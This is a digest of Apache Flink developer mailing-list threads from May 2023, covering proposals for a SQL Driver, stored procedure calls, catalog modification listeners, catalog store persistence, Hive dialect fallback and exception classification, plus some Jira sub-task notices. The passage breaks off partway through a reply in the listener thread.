Re: [DISCUSS] FLIP-316: Introduce SQL Driver

2023-05-31 Thread Weihua Hu
Thanks Paul for your reply.

SQLDriver looks good to me.

2. Do you mean to pass the SQL string as a configuration or a program argument?


I brought this up because we were unable to pass the SQL file to Flink
using Kubernetes mode.
DataStream/Python users need to prepare their own images for the jars
and dependencies.
But SQL users can use a common image to run different SQL queries
if there are no other UDF requirements.
It would be great if the SQL query and the image were not bound together.

Using strings is a way to decouple these, but just as you mentioned, it's
not easy to pass complex SQL.
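
For illustration only, here is a minimal sketch of a driver entrypoint that
takes the whole SQL script as a program argument; the class name and argument
handling are hypothetical (not part of the FLIP), and the naive ';' splitting
is exactly where complex SQL becomes painful:

```
import org.apache.flink.table.api.EnvironmentSettings;
import org.apache.flink.table.api.TableEnvironment;

// Hypothetical sketch: a SQL driver main class fed the SQL as a plain string,
// so the image and the query stay decoupled.
public final class SqlDriver {
    public static void main(String[] args) {
        String script = args[0]; // the SQL script passed as a program argument
        TableEnvironment tEnv =
                TableEnvironment.create(EnvironmentSettings.inStreamingMode());
        // Naive splitting: a ';' inside a string literal breaks this, which is
        // why passing complex SQL as a single string is tricky.
        for (String statement : script.split(";")) {
            if (!statement.isBlank()) {
                tEnv.executeSql(statement);
            }
        }
    }
}
```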

> use web submission
AFAIK, we cannot use web submission in Application mode. Please
correct me if I'm wrong.


Best,
Weihua


On Wed, May 31, 2023 at 9:37 PM Paul Lam  wrote:

> Hi Biao,
>
> Thanks for your comments!
>
> > 1. Scope: is this FLIP only targeted for non-interactive Flink SQL jobs
> in
> > Application mode? More specifically, if we use SQL client/gateway to
> > execute some interactive SQLs like a SELECT query, can we ask flink to
> use
> > Application mode to execute those queries after this FLIP?
>
> Thanks for pointing it out. I think only DMLs would be executed via SQL
> Driver.
> I'll add the scope to the FLIP.
>
> > 2. Deployment: I believe in YARN mode, the implementation is trivial as
> we
> > can ship files via YARN's tool easily but for K8s, things can be more
> > complicated as Shengkai said.
>
>
> Your input is very informative. I’m thinking about using web submission,
> but it requires exposing the JobManager port which could also be a problem
> on K8s.
>
> Another approach is to explicitly require a distributed storage to ship
> files,
> but we may need a new deployment executor for that.
>
> What do you think of these two approaches?
>
> > 3. Serialization of SessionState: in SessionState, there are some
> > unserializable fields
> > like org.apache.flink.table.resource.ResourceManager#userClassLoader. It
> > may be worthwhile to add more details about the serialization part.
>
> I agree. That’s a missing part. But if we use ExecNodeGraph as Shengkai
> mentioned, do we eliminate the need for serialization of SessionState?
>
> Best,
> Paul Lam
>
> > On May 31, 2023, at 13:07, Biao Geng wrote:
> >
> > Thanks Paul for the proposal! I believe it would be very useful for Flink
> > users.
> > After reading the FLIP, I have some questions:
> > 1. Scope: is this FLIP only targeted for non-interactive Flink SQL jobs
> in
> > Application mode? More specifically, if we use SQL client/gateway to
> > execute some interactive SQLs like a SELECT query, can we ask flink to
> use
> > Application mode to execute those queries after this FLIP?
> > 2. Deployment: I believe in YARN mode, the implementation is trivial as
> we
> > can ship files via YARN's tool easily but for K8s, things can be more
> > complicated as Shengkai said. I have implemented a simple POC
> > <
> https://github.com/bgeng777/flink/commit/5b4338fe52ec343326927f0fc12f015dd22b1133
> >
> > based on SQL client before (i.e., consider the SQL client which supports
> > executing a SQL file as the SQL driver in this FLIP). One problem I have
> > met is how we ship SQL files (or the JobGraph) to the K8s side. Without
> > such support, users have to modify the initContainer or rebuild a new K8s
> > image every time to fetch the SQL file. Like the Flink K8s operator, one
> > workaround is to utilize the Flink config (transforming the SQL file to an
> > escaped string like Weihua mentioned), which will be converted to a
> > ConfigMap, but K8s has a size limit on ConfigMaps (no larger than 1MB). Not
> > sure if we have better solutions.
> > 3. Serialization of SessionState: in SessionState, there are some
> > unserializable fields
> > like org.apache.flink.table.resource.ResourceManager#userClassLoader. It
> > may be worthwhile to add more details about the serialization part.
> >
> > Best,
> > Biao Geng
> >
Paul Lam wrote on Wed, May 31, 2023 at 11:49:
> >
> >> Hi Weihua,
> >>
> >> Thanks a lot for your input! Please see my comments inline.
> >>
> >>> - Is SQLRunner the better name? We use this to run a SQL Job. (Not
> >> strong,
> >>> the SQLDriver is fine for me)
> >>
> >> I’ve thought about SQL Runner but picked SQL Driver for the following
> >> reasons FYI:
> >>
> >> 1. I have a PythonDriver doing the same job for PyFlink [1]
> >> 2. A Flink program's main class is sort of like a Driver in JDBC, which
> >> translates SQL into
> >>    database-specific languages.
> >>
> >> In general, I’m +1 for SQL Driver and +0 for SQL Runner.
> >>
> >>> - Could we run SQL jobs using SQL in strings? Otherwise, we need to
> >> prepare
> >>> a SQL file in an image for Kubernetes application mode, which may be a
> >> bit
> >>> cumbersome.
> >>
> >> Do you mean to pass the SQL string as a configuration or a program argument?
> >>
> >> I thought it might be convenient for testing purposes, but not recommended
> >> for production, since Flink SQL could be complicated and involve lots of
> >> characters that need to be escaped.

Re: [DISCUSS] FLIP-311: Support Call Stored Procedure

2023-05-31 Thread Benchao Li
Thanks Yuxia for opening this discussion.

The general idea looks good to me. I only have one question about
`ProcedureContext#getExecutionEnvironment`: why are you proposing to return
a `StreamExecutionEnvironment` instead of a `TableEnvironment`? Could you
elaborate a little more on this?
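
For readers following along, here is a rough sketch of the shape under
discussion, pieced together only from the signatures mentioned in this thread
(`ProcedureContext#getExecutionEnvironment` returning a
`StreamExecutionEnvironment`, procedures returning `T[]`, and the rollback
example quoted below); `Procedure` and `ProcedureContext` are the FLIP's
proposed interfaces, everything else is illustrative:

```
import java.sql.Timestamp;
import org.apache.flink.streaming.api.environment.StreamExecutionEnvironment;

// Illustrative only; not the final FLIP-311 API.
public class RollbackProcedure implements Procedure {
    // The current design returns T[] rather than emitting rows through a
    // Collector the way a TableFunction does.
    public String[] call(ProcedureContext context, String tableName, Timestamp snapshotTime) {
        // The point in question: the context exposes a
        // StreamExecutionEnvironment, not a TableEnvironment.
        StreamExecutionEnvironment env = context.getExecutionEnvironment();
        // ... run the rollback against the external storage system ...
        return new String[] {"rolled back " + tableName + " to " + snapshotTime};
    }
}
```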

Jingsong Li wrote on Tue, May 30, 2023 at 17:58:

> Thanks for your explanation.
>
> We can support Iterable in future. Current design looks good to me.
>
> Best,
> Jingsong
>
> On Tue, May 30, 2023 at 4:56 PM yuxia  wrote:
> >
> > Hi, Jingsong.
> > Thanks for your feedback.
> >
> > > Does this need to be a function call? Do you have an example?
> > I think it'll be useful to support function calls when users call a
> procedure.
> > The following example is from iceberg:[1]
> > CALL catalog_name.system.migrate('spark_catalog.db.sample', map('foo',
> 'bar'));
> >
> > It allows users to use `map('foo', 'bar')` to pass map data to the
> procedure.
> >
> > Another case that I can imagine may be rolling back a table to the snapshot
> of one week ago.
> > Then, with a function call, a user may call `rollback(table_name, now() -
> INTERVAL '7' DAY)` to achieve this.
> >
> > Although it can be a function call, the parameter eventually received by the
> procedure will always be the evaluated literal.
> >
> >
> > > Procedure looks like a TableFunction, do you consider using Collector
> > something like TableFunction? (Supports large amount of data)
> >
> > Yes, I had considered it. But returning T[] is for simplicity.
> >
> > First, regarding how to return the result of calling a procedure, it
> looks more intuitive to me to use the return value of the `call` method
> instead of calling something like collector#collect.
> > Introducing a collector would add unnecessary complexity.
> >
> > Second, regarding supporting large amounts of data, according to my
> investigation, I haven't seen a requirement for returning large
> amounts of data.
> > Iceberg also returns an array. [2] If you do think we should support large
> amounts of data, I think we can change the return type from T[] to Iterable.
> >
> > [1]: https://iceberg.apache.org/docs/latest/spark-procedures/#migrate
> > [2]:
> https://github.com/apache/iceberg/blob/601c5af9b6abded79dabeba177331310d5487f43/spark/v3.2/spark/src/main/java/org/apache/spark/sql/connector/iceberg/catalog/Procedure.java#L44
> >
> > Best regards,
> > Yuxia
> >
> > - Original Message -
> > From: "Jingsong Li" 
> > To: "dev" 
> > Sent: Monday, May 29, 2023 2:42:04 PM
> > Subject: Re: [DISCUSS] FLIP-311: Support Call Stored Procedure
> >
> > Thanks Yuxia for the proposal.
> >
> > > CALL [catalog_name.][database_name.]procedure_name ([ expression [,
> expression]* ] )
> >
> > The expression can be a function call. Does this need to be a function
> > call? Do you have an example?
> >
> > > Procedure returns T[]
> >
> > Procedure looks like a TableFunction; have you considered using a Collector,
> > like TableFunction does? (to support large amounts of data)
> >
> > Best,
> > Jingsong
> >
> > On Mon, May 29, 2023 at 2:33 PM yuxia 
> wrote:
> > >
> > > Hi, everyone.
> > >
> > > I’d like to start a discussion about FLIP-311: Support Call Stored
> Procedure [1]
> > >
> > > Stored procedures provide a convenient way to encapsulate complex
> logic to perform data manipulation or administrative tasks in external
> storage systems. They're widely used in traditional databases and popular
> compute engines like Trino for their convenience. Therefore, we propose
> adding support for calling stored procedures in Flink to enable better
> integration with external storage systems.
> > >
> > > With this FLIP, Flink will allow connector developers to develop their
> own built-in stored procedures, and then enable users to call these
> predefined stored procedures.
> > >
> > > Looking forward to your feedback.
> > >
> > > [1]:
> https://cwiki.apache.org/confluence/display/FLINK/FLIP-311%3A+Support+Call+Stored+Procedure
> > >
> > > Best regards,
> > > Yuxia
>


-- 

Best,
Benchao Li


[jira] [Created] (FLINK-32234) Support execute truncate table statement

2023-05-31 Thread luoyuxia (Jira)
luoyuxia created FLINK-32234:


 Summary: Support execute truncate table statement
 Key: FLINK-32234
 URL: https://issues.apache.org/jira/browse/FLINK-32234
 Project: Flink
  Issue Type: Sub-task
  Components: Table SQL / API, Table SQL / Planner
Reporter: luoyuxia






--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Created] (FLINK-32233) Introduce SupportsTruncate interface

2023-05-31 Thread luoyuxia (Jira)
luoyuxia created FLINK-32233:


 Summary: Introduce SupportsTruncate interface
 Key: FLINK-32233
 URL: https://issues.apache.org/jira/browse/FLINK-32233
 Project: Flink
  Issue Type: Sub-task
  Components: Table SQL / API
Reporter: luoyuxia






--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Created] (FLINK-32232) Support parsing truncate table statement

2023-05-31 Thread luoyuxia (Jira)
luoyuxia created FLINK-32232:


 Summary: Support parsing truncate table statement
 Key: FLINK-32232
 URL: https://issues.apache.org/jira/browse/FLINK-32232
 Project: Flink
  Issue Type: Sub-task
  Components: Table SQL / API
Reporter: luoyuxia






--
This message was sent by Atlassian Jira
(v8.20.10#820010)


Re: [DISCUSSION] Improved USER/SYSTEM exception wrapping in Flink code base

2023-05-31 Thread Paul Lam
Hi Hong,

Thanks for starting the discussion! I believe the exception classification 
between 
user exceptions and system exceptions has been long-awaited.

It's worth mentioning that years ago there was a related discussion [1], FYI.

I’m in favor of the heuristic approach of classifying exceptions by which
classloader they come from. In addition, we could introduce extra configuration
to allow manual exception classification based on the package names of
exceptions.
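
To make the heuristic concrete, here is a minimal sketch of the idea, assuming
the classifier is handed the user-code classloader (the names are mine, not
from the proposal):

```
// Minimal sketch, not Flink code: walk the cause chain and treat the
// exception as USER if any throwable's class was loaded by the user-code
// classloader; otherwise assume a SYSTEM (engine) exception.
public final class ExceptionClassifier {
    public static boolean isUserException(Throwable t, ClassLoader userClassLoader) {
        for (Throwable cur = t; cur != null; cur = cur.getCause()) {
            if (cur.getClass().getClassLoader() == userClassLoader) {
                return true;
            }
        }
        return false;
    }
}
```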

[1] https://lists.apache.org/thread/gms4nysnb3o4v2k6421m5hsq0g7gtr81

Best,
Paul Lam

> On May 25, 2023, at 23:07, Teoh, Hong wrote:
> 
> Hi all,
> 
> This discussion thread is to gauge community opinion and gather feedback on 
> implementing a better exception hierarchy in Flink to identify exceptions 
> that come from running “User job code” and exceptions coming from “Flink 
> engine code”.
> 
> Problem:
> Flink provides a distributed processing engine (SYSTEM) to run a data 
> streaming job (USER). There are many places in code where the engine runs 
> “user job provided java classes”, such as serialization/deserialization, 
> configuration objects, credential loading, running setup() method on certain 
> Operators.
> Sometimes when evaluating a stack trace, it might be hard to automatically 
> determine if an exception is arising out of a Flink engine problem, or a 
> problem associated with a particular job.
> 
> Proposed way forward:
> - It would be good to have an exception hierarchy maintained by Flink that 
> separates out the exceptions arising from running “USER provided classes”. 
> That way, we can improve our ability to automatically classify and mitigate 
> these exceptions.
> - We could also separate out the places where the exception originates 
> based on function - FlinkSerializationException, 
> FlinkConfigurationException, etc. (we already have a similar concept with 
> IncompatibleKeysException)
> - This has synergy with FLIP-304: Pluggable Failure Enrichers (since it would 
> simplify the logic in the USER/SYSTEM classifier there) [1].
> - In addition, this has been discussed before in the context of updating the 
> exception thrown by serialisers to be a Flink-specific serialisation 
> exception instead of IllegalStateException [2]
> 
> 
> Any thoughts on the above?
> 
> Regards,
> Hong
> 
> 
> [1] 
> https://cwiki.apache.org/confluence/display/FLINK/FLIP-304%3A+Pluggable+Failure+Enrichers
> [2] https://lists.apache.org/thread/0o859h1vdx6mwv0fqvmybpn574692jtg
> 
> 



Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener

2023-05-31 Thread yuxia
Thanks for the explanation. Makes sense to me.

Best regards,
Yuxia

- Original Message -
From: "Shammon FY" 
To: "dev" 
Sent: Thursday, June 1, 2023 10:45:12 AM
Subject: Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener

Thanks yuxia, you're right and I'll add the new database to
AlterDatabaseEvent.

I added `ignoreIfNotExists` for AlterDatabaseEvent because it is a
parameter in the `Catalog.alterDatabase` method. Although this value is
currently always false in `AlterDatabaseOperation`, I think it's better
to stay consistent with `Catalog.alterDatabase`. What do you think?

Best,
Shammon FY

On Thu, Jun 1, 2023 at 10:25 AM yuxia  wrote:

> Hi, Shammon.
> I mean, do we need to include the new database after the alter in
> AlterDatabaseEvent, so that the listener can know what has been modified
> for the database? Or does the listener not need to care about the actual
> modification?
> Also, I'm wondering whether AlterDatabaseEvent needs to include the
> ignoreIfNotExists method, since the alter database operation doesn't have
> syntax like 'alter database if exists xxx'.
>
> Best regards,
> Yuxia
>
> - Original Message -
> From: "Shammon FY" 
> To: "dev" 
> Sent: Wednesday, May 31, 2023 2:55:26 PM
> Subject: Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener
>
> Hi yuxia
>
> Thanks for your input. The `AlterDatabaseEvent` extends
> `DatabaseModificationEvent` which has the original database.
>
> Best,
> Shammon FY
>
> On Wed, May 31, 2023 at 2:24 PM yuxia  wrote:
>
> > Thanks Shammon for driving it.
> > The FLIP generally looks good to me. I only have one question.
> > WRT AlterDatabaseEvent, IIUC, it'll contain the origin database name and
> > the new CatalogDatabase after modified. Is it enough only pass the origin
> > database name? Will it be better to contain the origin CatalogDatabase so
> > that listener have ways to know what changes?
> >
> > Best regards,
> > Yuxia
> >
> > - Original Message -
> > From: "ron9 liu" 
> > To: "dev" 
> > Sent: Wednesday, May 31, 2023 11:36:04 AM
> > Subject: Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener
> >
> > Hi, Shammon
> >
> > Thanks for driving this FLIP, It will enforce the Flink metadata
> capability
> > from the platform produce perspective. The overall design looks good to
> me,
> > I just have some small question:
> > 1. Regarding CatalogModificationListenerFactory#createListener method, I
> > think it would be better to pass Context as its parameter instead of two
> > specific Object. In this way, we can easily extend it in the future and
> > there will be no compatibility problems. Refer to
> >
> >
> https://github.com/apache/flink/blob/9880ba5324d4a1252d6ae1a3f0f061e4469a05ac/flink-table/flink-table-common/src/main/java/org/apache/flink/table/factories/DynamicTableFactory.java#L81
> > 2. In FLIP, you mentioned that multiple Flink tables may refer to the
> same
> > physical table, so does the Listener report this physical table
> repeatedly?
> > 3. When registering a Listener object, will it connect to an external
> > system such as Datahub? If the Listener object registration times out due
> > to permission issues, it will affect the execution of all subsequent SQL,
> > what should we do in this case?
> >
> > Best,
> > Ron
> >
> > > Shammon FY wrote on Wed, May 31, 2023 at 08:53:
> >
> > > Thanks Feng, the catalog modification listener is only used to report
> > > read-only ddl information to other components or systems.
> > >
> > > > 1. Will an exception thrown by the listener affect the normal
> execution
> > > process?
> > >
> > > Users need to handle the exception in the listener themselves. Many
> DDLs
> > > such as drop tables and alter tables cannot be rolled back, Flink
> cannot
> > > handle these exceptions for the listener. It will cause the operation
> to
> > > exit if an exception is thrown, but the executed DDL will be
> successful.
> > >
> > > > 2. What is the order of execution? Is the listener executed first or
> > are
> > > specific operations executed first?  If I want to perform DDL
> permission
> > > verification(such as integrating with Ranger based on the listener) ,
> is
> > > that possible?
> > >
> > > The listener will be notified to report catalog modification after DDLs
> > are
> > > successful, so you can not do permission verification for DDL in the
> > > listener. As mentioned above, Flink will not roll back the DDL even
> when
> > > the listener throws an exception. I think permission verification is
> > > another issue and can be discussed separately.
> > >
> > >
> > > Best,
> > > Shammon FY
> > >
> > > On Tue, May 30, 2023 at 1:07 AM Feng Jin 
> wrote:
> > >
> > > > Hi, Shammon
> > > >
> > > > Thanks for driving this Flip, [Support Customized Job Meta Data
> > Listener]
> > > > will  make it easier for Flink to collect lineage information.
> > > > I fully agree with the overall solution and have a small question:
> > > >
> > > > 1. Will an exception thrown by the listener affect the normal
> execution
> > > > process?
> > > >
> > > > 2. What is 

Re: [DISCUSS] Hive dialect shouldn't fall back to Flink's default dialect

2023-05-31 Thread yuxia
Hi, Jingsong. It's hard to provide an option, given that we also
want to decouple Hive from the Flink planner.
If we keep the fallback behavior, we will still depend on the `ParserImpl`
provided by flink-table-planner in HiveParser.
But to minimize the impact on users and be more user-friendly, when HiveParser
fails to parse a statement, I'll remind users in the error message that they
may use `SET table.sql-dialect = default;` to switch to Flink's default dialect.
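
For illustration, the error path could look roughly like the sketch below; the
exception type and wording are my assumption (`statement` stands for the SQL
being parsed), not part of the proposal:

```
// Sketch only: fail fast with a hint instead of silently falling back.
throw new org.apache.flink.table.api.SqlParserException(
        String.format(
                "Failed to parse statement '%s' with the Hive dialect. "
                        + "If this is a Flink-specific statement, run "
                        + "'SET table.sql-dialect = default;' and retry.",
                statement));
```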

Best regards,
Yuxia

- Original Message -
From: "Jingsong Li" 
To: "Rui Li" 
Cc: "dev" , "yuxia" , "User" 

Sent: Tuesday, May 30, 2023 3:21:56 PM
Subject: Re: [DISCUSS] Hive dialect shouldn't fall back to Flink's default dialect

+1, the fallback looks weird now, it is outdated.

But, it is good to provide an option. I don't know if there are some
users who depend on this fallback.

Best,
Jingsong

On Tue, May 30, 2023 at 1:47 PM Rui Li  wrote:
>
> +1, the fallback was just intended as a temporary workaround to run 
> catalog/module related statements with hive dialect.
>
> On Mon, May 29, 2023 at 3:59 PM Benchao Li  wrote:
>>
>> Big +1 on this, thanks yuxia for driving this!
>>
>> yuxia wrote on Mon, May 29, 2023 at 14:55:
>>
>> > Hi, community.
>> >
>> > I want to start a discussion about making the Hive dialect not fall back to
>> > Flink's default dialect.
>> >
>> > Currently, when the HiveParser fails to parse a SQL statement in Hive dialect,
>> > it'll fall back to Flink's default parser[1] to handle Flink-specific
>> > statements like "CREATE CATALOG xx with (xx);".
>> >
>> > As I'm involved with the Hive dialect and have recently communicated with
>> > community users who use it, I'm thinking of throwing an exception
>> > directly instead of falling back to Flink's default dialect when failing to
>> > parse the SQL in Hive dialect.
>> >
>> > Here're some reasons:
>> >
>> > First of all, it hides some errors with the Hive dialect. For example, we
>> > found we couldn't use the Hive dialect any more with the Flink SQL client in
>> > the release validation phase[2]. We finally found that a modification in the
>> > Flink SQL client caused it, but our test case couldn't catch it earlier:
>> > although HiveParser failed to parse the statement, it fell back to the
>> > default parser and the test case passed successfully.
>> >
>> > Second, conceptually, the Hive dialect should have nothing to do with Flink's
>> > default dialect. They are two totally different dialects. If we do need a
>> > dialect mixing the Hive dialect and the default dialect, maybe we need to propose
>> > a new hybrid dialect and announce the hybrid behavior to users.
>> > Also, the fallback behavior has confused some users; this comes from questions
>> > I've been asked by community users. Throwing an exception directly
>> > when failing to parse a SQL statement in Hive dialect will be more
>> > intuitive.
>> >
>> > Last but not least, it's important to decouple Hive from the Flink planner[3]
>> > before we can externalize the Hive connector[4]. If we still fall back to Flink's
>> > default dialect, then we will need to depend on `ParserImpl` in the Flink planner,
>> > which will block us from removing the provided dependency of the Hive dialect as
>> > well as externalizing the Hive connector.
>> >
>> > Although we never announced the fallback behavior, some users
>> > may implicitly depend on it in their SQL jobs. So, I hereby
>> > open the discussion about abandoning the fallback behavior to make the Hive
>> > dialect clear and isolated.
>> > Please remember it won't break the Hive syntax, but syntax specific
>> > to Flink may fail after this. For the failed SQL, you can use `SET
>> > table.sql-dialect=default;` to switch to the Flink dialect.
>> > If there are some Flink-specific statements we find should be included in
>> > the Hive dialect for ease of use, I think we can still add them as special
>> > cases to the Hive dialect.
>> >
>> > Looking forward to your feedback. I'd love to hear feedback from the
>> > community to decide on the next steps.
>> >
>> > [1]:
>> > https://github.com/apache/flink/blob/678370b18e1b6c4a23e5ce08f8efd05675a0cc17/flink-connectors/flink-connector-hive/src/main/java/org/apache/flink/table/planner/delegation/hive/HiveParser.java#L348
>> > [2]:https://issues.apache.org/jira/browse/FLINK-26681
>> > [3]:https://issues.apache.org/jira/browse/FLINK-31413
>> > [4]:https://issues.apache.org/jira/browse/FLINK-30064
>> >
>> >
>> >
>> > Best regards,
>> > Yuxia
>> >
>>
>>
>> --
>>
>> Best,
>> Benchao Li
>
>
>
> --
> Best regards!
> Rui Li


Re: [DISCUSS] FLIP 295: Support persistence of Catalog configuration and asynchronous registration

2023-05-31 Thread Feng Jin
Hi, thanks all for reviewing the FLIP.

@Ron

>  Regarding the CatalogStoreFactory#createCatalogStore method, do we need
to provide a default implementation?

Yes, we will provide a default InMemoryCatalogStoreFactory to create an
InMemoryCatalogStore.

>  If we get a Catalog from CatalogStore, after initializing it, whether we
put it in the Map<String, Catalog> catalogs again?

Yes, in the current design, catalogs are stored as snapshots, and once
initialized, the Catalog will be placed in the Map<String, Catalog> catalogs.
Subsequently, the Map<String, Catalog> catalogs map will be the primary source
for obtaining the corresponding Catalog.
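
As a rough illustration of that lookup order (a hypothetical sketch; the field
and helper names are mine, and the thread itself still varies on whether the
store method is `get` or `getCatalog`):

```
// Hypothetical sketch of the behavior described above: serve initialized
// catalogs from the in-memory map first; on a miss, fetch the
// CatalogDescriptor from the CatalogStore and lazily initialize the catalog once.
public Optional<Catalog> getCatalog(String catalogName) {
    Catalog cached = catalogs.get(catalogName); // the Map<String, Catalog> snapshot
    if (cached != null) {
        return Optional.of(cached);
    }
    return catalogStore
            .getCatalog(catalogName) // assumed to return Optional<CatalogDescriptor>
            .map(descriptor -> {
                Catalog catalog = initCatalog(catalogName, descriptor); // lazy init
                catalogs.put(catalogName, catalog);
                return catalog;
            });
}
```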

>   how about renaming them to `catalog.store.type` and
`catalog.store.path`?

I think it is okay. Adding "sql" at the beginning may seem a bit strange. I
will update the FLIP.



@Shammon

Thank you for the review. I have made the necessary corrections.
Regarding the modifications made to the Public Interface, I have also
included the relevant changes to the `TableEnvironment`.


Best,
Feng


On Wed, May 31, 2023 at 5:02 PM Shammon FY  wrote:

> Hi feng,
>
> Thanks for updating, I have some minor comments
>
> 1. The modification of `CatalogManager` should not be in `Public
> Interfaces`, it is not a public interface.
>
> 2. `@PublicEvolving` should be added for `CatalogStore` and
> `CatalogStoreFactory`
>
> 3. The code `Optional<Catalog> optionalDescriptor =
> catalogStore.get(catalogName);` in the `CatalogManager` should be
> `Optional<CatalogDescriptor> optionalDescriptor =
> catalogStore.get(catalogName);`
>
> Best,
> Shammon FY
>
>
> On Wed, May 31, 2023 at 2:24 PM liu ron  wrote:
>
> > Hi, Feng
> >
> > Thanks for driving this FLIP, this proposal is very useful for catalog
> > management.
> > I have some small questions:
> >
> > 1. Regarding the CatalogStoreFactory#createCatalogStore method, do we
> need
> > to provide a default implementation?
> > 2. If we get a Catalog from CatalogStore, after initializing it, do we
> > put it into the Map<String, Catalog> catalogs again?
> > 3. Regarding the options `sql.catalog.store.type` and
> > `sql.catalog.store.file.path`, how about renaming them to
> > `catalog.store.type` and `catalog.store.path`?
> >
> > Best,
> > Ron
> >
> > Feng Jin wrote on Mon, May 29, 2023 at 21:19:
> >
> > > Hi yuxia
> > >
> > >  > But from the code in Proposed Changes, once we register the Catalog,
> > we
> > > initialize it and open it. right?
> > >
> > > Yes, In order to avoid inconsistent semantics of the original CREATE
> > > CATALOG DDL, Catalog will be directly initialized in registerCatalog so
> > > that parameter validation can be performed.
> > >
> > > In the current design, lazy initialization is mainly reflected in
> > > getCatalog. If CatalogStore has already saved some catalog
> > configurations,
> > > only initialization is required in getCatalog.
> > >
> > >
> > > Best,
> > > Feng
> > >
> > > On Mon, May 29, 2023 at 8:27 PM yuxia 
> > wrote:
> > >
> > > > Hi, Feng.
> > > > I'm trying to understand the meaning of *lazy initialization*. If I'm
> > > > wrong, please correct me.
> > > >
> > > > IIUC, lazy initialization means you initialize the catalog only when you
> > > > need to access it. But from the code in Proposed Changes, once we
> > > register
> > > > the Catalog,
> > > > we initialize it and open it. right?
> > > >
> > > > Best regards,
> > > > Yuxia
> > > >
> > > > - Original Message -
> > > > From: "Jing Ge" 
> > > > To: "dev" 
> > > > Sent: Monday, May 29, 2023 5:12:46 PM
> > > > Subject: Re: [DISCUSS] FLIP 295: Support persistence of Catalog
> > configuration
> > > > and asynchronous registration
> > > >
> > > > Hi Feng,
> > > >
> > > > Thanks for your effort! +1 for the proposal.
> > > >
> > > > One of the major changes is that the current design will provide
> > > > Map<String, Catalog> catalogs as a snapshot instead of a cache, which
> > > means
> > > > once it has been initialized, any changes done by other sessions will
> > not
> > > > affect it. Point 6 described follow-up options for further
> improvement.
> > > >
> > > > Best regards,
> > > > Jing
> > > >
> > > > On Mon, May 29, 2023 at 5:31 AM Feng Jin 
> > wrote:
> > > >
> > > > > Hi all, I would like to update you on the latest progress of the
> > FLIP.
> > > > >
> > > > >
> > > > > Last week, Leonard Xu, HangRuan, Jing Ge, Shammon FY, ShengKai Fang
> > > and I
> > > > > had an offline discussion regarding the overall solution for Flink
> > > > > CatalogStore. We have reached a consensus and I have updated the
> > final
> > > > > solution in FLIP.
> > > > >
> > > > > Next, let me briefly describe the entire design:
> > > > >
> > > > >1.
> > > > >
> > > > >Introduce CatalogDescriptor to store catalog configuration
> similar
> > > to
> > > > >TableDescriptor.
> > > > >2.
> > > > >
> > > > >The two key functions of CatalogStore - void storeCatalog(String
> > > > >catalogName, CatalogDescriptor) and CatalogDescriptor
> > > > getCatalog(String)
> > > > >will both use CatalogDescriptor instead of Catalog instance.
> This
> > > way,
> > > > >CatalogStore will only be 

Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener

2023-05-31 Thread Shammon FY
Thanks yuxia, you're right and I'll add the new database to
AlterDatabaseEvent.

I added `ignoreIfNotExists` for AlterDatabaseEvent because it is a
parameter in the `Catalog.alterDatabase` method. Although this value is
currently always false in `AlterDatabaseOperation`, I think it's better
to stay consistent with `Catalog.alterDatabase`. What do you think?
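
To make the shape concrete, the event could end up looking roughly like this
(a sketch based only on what's discussed in this thread; the method names are
illustrative, not final):

```
// Sketch, not the FLIP's final API: AlterDatabaseEvent extends
// DatabaseModificationEvent (which already carries the original database) and
// adds the post-ALTER database plus ignoreIfNotExists, mirroring
// Catalog.alterDatabase(String, CatalogDatabase, boolean).
public interface AlterDatabaseEvent extends DatabaseModificationEvent {
    CatalogDatabase newDatabase(); // the database definition after ALTER

    boolean ignoreIfNotExists();   // kept consistent with Catalog.alterDatabase
}
```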

Best,
Shammon FY

On Thu, Jun 1, 2023 at 10:25 AM yuxia  wrote:

> Hi, Shammon.
> I mean, do we need to include the new database after the alter in
> AlterDatabaseEvent, so that the listener can know what has been modified
> for the database? Or does the listener not need to care about the actual
> modification?
> Also, I'm wondering whether AlterDatabaseEvent needs to include the
> ignoreIfNotExists method, since the alter database operation doesn't have
> syntax like 'alter database if exists xxx'.
>
> Best regards,
> Yuxia
>
> - Original Message -
> From: "Shammon FY" 
> To: "dev" 
> Sent: Wednesday, May 31, 2023 2:55:26 PM
> Subject: Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener
>
> Hi yuxia
>
> Thanks for your input. The `AlterDatabaseEvent` extends
> `DatabaseModificationEvent` which has the original database.
>
> Best,
> Shammon FY
>
> On Wed, May 31, 2023 at 2:24 PM yuxia  wrote:
>
> > Thanks Shammon for driving it.
> > The FLIP generally looks good to me. I only have one question.
> > WRT AlterDatabaseEvent, IIUC, it'll contain the origin database name and
> > the new CatalogDatabase after modified. Is it enough only pass the origin
> > database name? Will it be better to contain the origin CatalogDatabase so
> > that listener have ways to know what changes?
> >
> > Best regards,
> > Yuxia
> >
> > - Original Message -
> > From: "ron9 liu" 
> > To: "dev" 
> > Sent: Wednesday, May 31, 2023 11:36:04 AM
> > Subject: Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener
> >
> > Hi, Shammon
> >
> > Thanks for driving this FLIP, It will enforce the Flink metadata
> capability
> > from the platform produce perspective. The overall design looks good to
> me,
> > I just have some small question:
> > 1. Regarding CatalogModificationListenerFactory#createListener method, I
> > think it would be better to pass Context as its parameter instead of two
> > specific Object. In this way, we can easily extend it in the future and
> > there will be no compatibility problems. Refer to
> >
> >
> https://github.com/apache/flink/blob/9880ba5324d4a1252d6ae1a3f0f061e4469a05ac/flink-table/flink-table-common/src/main/java/org/apache/flink/table/factories/DynamicTableFactory.java#L81
> > 2. In FLIP, you mentioned that multiple Flink tables may refer to the
> same
> > physical table, so does the Listener report this physical table
> repeatedly?
> > 3. When registering a Listener object, will it connect to an external
> > system such as Datahub? If the Listener object registration times out due
> > to permission issues, it will affect the execution of all subsequent SQL,
> > what should we do in this case?
> >
> > Best,
> > Ron
> >
> > Shammon FY wrote on Wed, May 31, 2023 at 08:53:
> >
> > > Thanks Feng, the catalog modification listener is only used to report
> > > read-only ddl information to other components or systems.
> > >
> > > > 1. Will an exception thrown by the listener affect the normal
> execution
> > > process?
> > >
> > > Users need to handle the exception in the listener themselves. Many
> DDLs
